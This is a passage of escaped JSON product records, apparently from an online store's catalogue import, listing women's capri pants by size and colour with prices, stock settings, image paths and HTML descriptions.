wp08-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/p\\/wp08-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"29\",\"color\":\"Red\"},\"1821\":{\"sku\":\"WP08\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"configurable\",\"categories\":\"Default Category\\/Women\\/Bottoms\\/Pants,Default Category\\/Promotions\\/Pants,Default Category\",\"product_websites\":\"base\",\"name\":\"Bardot Capri\",\"description\":\"<p>Black is back &mdash; was it ever gone? &mdash; which means all your favorite tops will get along with the comfortable and versatile Bardot Capri.<\\/p>\\n<p>&bull; Black capris with pink waistband.<br \\/>&bull; Cropped leggings.<br \\/>&bull; Waistband drawcord. <br \\/>&bull; Flat, thin and flattering.<br \\/>&bull; Made with organic fabric.<\\/p>\",\"short_description\":null,\"weight\":null,\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Catalog, Search\",\"price\":\"48\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":null,\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/p\\/wp08-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/p\\/wp08-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/p\\/wp08-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=1,required_options=1,style_bottom=Capri|Leggings,material=Microfiber|Rayon|Spandex,pattern=Color-Blocked,climate=Indoor|Hot|Mild|Warm,eco_collection=No,performance_fabric=No,erin_recommends=No,new=No,sale=No\",\"qty\":\"0\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":\"sku=WP08-28-Black,size=28,color=Black|sku=WP08-28-Green,size=28,color=Green|sku=WP08-28-Red,size=28,color=Red|sku=WP08-29-Black,size=29,color=Black|sku=WP08-29-Green,size=29,color=Green|sku=WP08-29-Red,size=29,color=Red\",\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/p\\/wp08-black_back.jpg\",\"image\":\"\\/w\\/p\\/wp08-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/p\\/wp08-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/p\\/wp08-black_back.jpg\",\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"1\",\"required_options\":\"1\",\"style_bottom\":\"Capri|Leggings\",\"material\":\"Microfiber|Rayon|Spandex\",\"pattern\":\"Color-Blocked\",\"climate\":\"Indoor|Hot|Mild|Warm\",\"eco_collection\":\"No\",\"performance_fabric\":\"No\",\"erin_recommends\":\"No\",\"new\":\"No\",\"sale\":\"No\"},\"1822\":{\"sku\":\"WP09-28-Black\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Bottoms\\/Pants,Default Category\\/Promotions\\/Pants,Default Category\",\"product_websites\":\"base\",\"name\":\"Carina Basic Capri-28-Black\",\"description\":\"<p>Perfect as workout pants or \\\"accessory,\\\" the Carina Basic Capri is comfy as it is practical -- try it under skirts or shorts.<\\/p>\\n<p>&bull; Black capris with rouching detail.<br \\/>&bull; 93% cotton, 7% spandex.<br \\/>&bull; Elasticized waistband.<br \\/>&bull; Reinforced seams with exposed topstitching.<br \\/>&bull; Soft, medium-weight jersey with added stretch.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"51\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"carina-basic-capri-28-black\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/p\\/wp09-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/p\\/wp09-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/p\\/wp09-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=28,color=Black\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/p\\/wp09-black_alt1.jpg,\\/w\\/p\\/wp09-black_back.jpg,\\/w\\/p\\/wp09-black_outfit.jpg\",\"image\":\"\\/w\\/p\\/wp09-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/p\\/wp09-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/p\\/wp09-black_alt1.jpg,\\/w\\/p\\/wp09-black_back.jpg,\\/w\\/p\\/wp09-black_outfit.jpg\",\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"28\",\"color\":\"Black\"},\"1823\":{\"sku\":\"WP09-28-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Bottoms\\/Pants,Default Category\\/Promotions\\/Pants,Default Category\",\"product_websites\":\"base\",\"name\":\"Carina Basic Capri-28-Blue\",\"description\":\"<p>Perfect as workout pants or \\\"accessory,\\\" the Carina Basic Capri is comfy as it is practical -- try it under skirts or shorts.<\\/p>\\n<p>&bull; Black capris with rouching detail.<br \\/>&bull; 93% cotton, 7% spandex.<br \\/>&bull; Elasticized waistband.<br \\/>&bull; Reinforced seams with exposed topstitching.<br \\/>&bull; Soft, medium-weight jersey with added stretch.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"51\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"carina-basic-capri-28-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/p\\/wp09-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/p\\/wp09-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/p\\/wp09-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=28,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/p\\/wp09-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/p\\/wp09-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"28\",\"color\":\"Blue\"},\"1824\":{\"sku\":\"WP09-28-Purple\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Bottoms\\/Pants,Default Category\\/Promotions\\/Pants,Default Category\",\"product_websites\":\"base\",\"name\":\"Carina Basic Capri-28-Purple\",\"description\":\"<p>Perfect as workout pants or \\\"accessory,\\\" the Carina Basic Capri is comfy as it is practical -- try it under skirts or shorts.<\\/p>\\n<p>&bull; Black capris with rouching detail.<br \\/>&bull; 93% cotton, 7% spandex.<br \\/>&bull; Elasticized waistband.<br \\/>&bull; Reinforced seams with exposed topstitching.<br \\/>&bull; Soft, medium-weight jersey with added stretch.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"51\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"carina-basic-capri-28-purple\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/p\\/wp09-purple_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/p\\/wp09-purple_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/p\\/wp09-purple_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=28,color=Purple\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/p\\/wp09-purple_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/p\\/wp09-purple_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"28\",\"color\":\"Purple\"},\"1825\":{\"sku\":\"WP09-29-Black\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Bottoms\\/Pants,Default Category\\/Promotions\\/Pants,Default Category\",\"product_websites\":\"base\",\"name\":\"Carina Basic Capri-29-Black\",\"description\":\"<p>Perfect as workout pants or \\\"accessory,\\\" the Carina Basic Capri is comfy as it is practical -- try it under skirts or shorts.<\\/p>\\n<p>&bull; Black capris with rouching detail.<br \\/>&bull; 93% cotton, 7% spandex.<br \\/>&bull; Elasticized waistband.<br \\/>&bull; Reinforced seams with exposed topstitching.<br \\/>&bull; Soft, medium-weight jersey with added stretch.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"51\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"carina-basic-capri-29-black\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/p\\/wp09-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/p\\/wp09-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/p\\/wp09-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=29,color=Black\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/p\\/wp09-black_alt1.jpg,\\/w\\/p\\/wp09-black_back.jpg,\\/w\\/p\\/wp09-black_outfit.jpg\",\"image\":\"\\/w\\/p\\/wp09-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/p\\/wp09-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/p\\/wp09-black_alt1.jpg,\\/w\\/p\\/wp09-black_back.jpg,\\/w\\/p\\/wp09-black_outfit.jpg\",\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"29\",\"color\":\"Black\"},\"1826\":{\"sku\":\"WP09-29-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Bottoms\\/Pants,Default Category\\/Promotions\\/Pants,Default Category\",\"product_websites\":\"base\",\"name\":\"Carina Basic Capri-29-Blue\",\"description\":\"<p>Perfect as workout pants or \\\"accessory,\\\" the Carina Basic Capri is comfy as it is practical -- try it under skirts or shorts.<\\/p>\\n<p>&bull; Black capris with rouching detail.<br \\/>&bull; 93% cotton, 7% spandex.<br \\/>&bull; Elasticized waistband.<br \\/>&bull; Reinforced seams with exposed topstitching.<br \\/>&bull; Soft, medium-weight jersey with added stretch.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"51\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"carina-basic-capri-29-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/p\\/wp09-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/p\\/wp09-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/p\\/wp09-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=29,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/p\\/wp09-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/p\\/wp09-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"29\",\"color\":\"Blue\"},\"1827\":{\"sku\":\"WP09-29-Purple\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Bottoms\\/Pants,Default Category\\/Promotions\\/Pants,Default Category\",\"product_websites\":\"base\",\"name\":\"Carina Basic Capri-29-Purple\",\"description\":\"<p>Perfect as workout pants or \\\"accessory,\\\" the Carina Basic Capri is comfy as it is practical -- try it under skirts or shorts.<\\/p>\\n<p>&bull; Black capris with rouching detail.<br \\/>&bull; 93% cotton, 7% spandex.<br \\/>&bull; Elasticized waistband.<br \\/>&bull; Reinforced seams with exposed topstitching.<br \\/>&bull; Soft, medium-weight jersey with added stretch.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"51\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"carina-basic-capri-29-purple\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/p\\/wp09-purple_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/p\\/wp09-purple_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/p\\/wp09-purple_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=29,color=Purple\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/p\\/wp09-purple_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/p\\/wp09-purple_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"29\",\"color\":\"Purple\"},\"1828\":{\"sku\":\"WP09\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"configurable\",\"categories\":\"Default Category\\/Women\\/Bottoms\\/Pants,Default Category\\/Promotions\\/Pants,Default Category\",\"product_websites\":\"base\",\"name\":\"Carina Basic Capri\",\"description\":\"<p>Perfect as workout pants or \\\"accessory,\\\" the Carina Basic Capri is comfy as it is practical -- try it under skirts or shorts.<\\/p>\\n<p>&bull; Black capris with rouching detail.<br \\/>&bull; 93% cotton, 7% spandex.<br \\/>&bull; Elasticized waistband.<br \\/>&bull; Reinforced seams with exposed topstitching.<br \\/>&bull; Soft, medium-weight jersey with added stretch.<\\/p>\",\"short_description\":null,\"weight\":null,\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Catalog, Search\",\"price\":\"51\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":null,\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/p\\/wp09-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/p\\/wp09-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/p\\/wp09-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=1,required_options=1,style_bottom=Capri|Compression|Leggings,material=Cotton|Spandex,pattern=Solid,climate=All-weather|Indoor|Mild|Spring|Warm,eco_collection=No,performance_fabric=No,erin_recommends=No,new=No,sale=No\",\"qty\":\"0\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":\"sku=WP09-28-Black,size=28,color=Black|sku=WP09-28-Blue,size=28,color=Blue|sku=WP09-28-Purple,size=28,color=Purple|sku=WP09-29-Black,size=29,color=Black|sku=WP09-29-Blue,size=29,color=Blue|sku=WP09-29-Purple,size=29,color=Purple\",\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/p\\/wp09-black_alt1.jpg,\\/w\\/p\\/wp09-black_back.jpg,\\/w\\/p\\/wp09-black_outfit.jpg\",\"image\":\"\\/w\\/p\\/wp09-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/p\\/wp09-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/p\\/wp09-black_alt1.jpg,\\/w\\/p\\/wp09-black_back.jpg,\\/w\\/p\\/wp09-black_outfit.jpg\",\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"1\",\"required_options\":\"1\",\"style_bottom\":\"Capri|Compression|Leggings\",\"material\":\"Cotton|Spandex\",\"pattern\":\"Solid\",\"climate\":\"All-weather|Indoor|Mild|Spring|Warm\",\"eco_collection\":\"No\",\"performance_fabric\":\"No\",\"erin_recommends\":\"No\",\"new\":\"No\",\"sale\":\"No\"},\"1829\":{\"sku\":\"WP10-28-Black\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Bottoms\\/Pants,Default Category\\/Promotions\\/Pants,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Daria Bikram Pant-28-Black\",\"description\":\"<p>The Daria 